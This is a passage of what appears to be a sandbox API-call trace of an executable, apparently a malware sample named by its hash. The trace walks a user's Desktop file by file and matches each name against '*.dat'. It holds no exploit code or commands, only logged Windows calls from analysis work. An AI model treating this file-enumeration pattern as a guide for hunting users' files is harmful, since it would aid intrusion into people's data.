ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.670] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.670] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.670] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.670] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.670] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.670] lstrcatW (in: lpString1="\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="\\31NPwfpy_GlRh15.m4a") returned="\\31NPwfpy_GlRh15.m4a" [0110.670] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.670] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea918 [0110.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea918, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.671] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.671] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0110.671] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.672] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabb8 [0110.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabb8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.672] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*.dat") returned 0 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.672] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.672] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.672] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.672] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.672] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.672] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.672] lstrcatW (in: lpString1="\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="\\38ZOxe4ZNObW5Sq.pdf") returned="\\38ZOxe4ZNObW5Sq.pdf" [0110.672] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.672] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea4d8 [0110.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea4d8, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.672] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea4d8 | out: hHeap=0x29a0000) returned 1 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.672] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaab0 [0110.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaab0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.672] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*.dat") returned 0 [0110.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.672] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.672] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.672] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.673] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.673] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.673] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.673] lstrcatW (in: lpString1="\\", lpString2="7eG9d7.mp4" | out: lpString1="\\7eG9d7.mp4") returned="\\7eG9d7.mp4" [0110.673] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.673] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.673] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.673] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.673] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.673] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab88 [0110.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab88, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0110.674] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*.dat") returned 0 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.674] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.674] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.674] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.674] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.674] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.674] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.674] lstrcatW (in: lpString1="\\", lpString2="desktop.ini" | out: lpString1="\\desktop.ini") returned="\\desktop.ini" [0110.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac48 [0110.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac48, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.674] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.dat") returned 0 [0110.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.674] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.674] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.674] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.674] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.674] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.674] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.675] lstrcatW (in: lpString1="\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.675] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*.dat") returned 0 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1230 | out: hHeap=0x29a0000) returned 1 [0110.675] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.675] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.675] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.675] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.675] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.675] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.675] lstrcatW (in: lpString1="\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="\\fmnAnasf2I.mp4") returned="\\fmnAnasf2I.mp4" [0110.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac60, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac60 | out: hHeap=0x29a0000) returned 1 [0110.675] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*.dat") returned 0 [0110.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.676] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.676] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.676] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.676] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.676] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.676] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.676] lstrcatW (in: lpString1="\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="\\g3fX8Y8-txe9_Es.m4a") returned="\\g3fX8Y8-txe9_Es.m4a" [0110.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea618, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.676] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea618 | out: hHeap=0x29a0000) returned 1 [0110.676] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.676] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.676] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*.dat") returned 0 [0110.676] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.677] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.677] lstrcatW 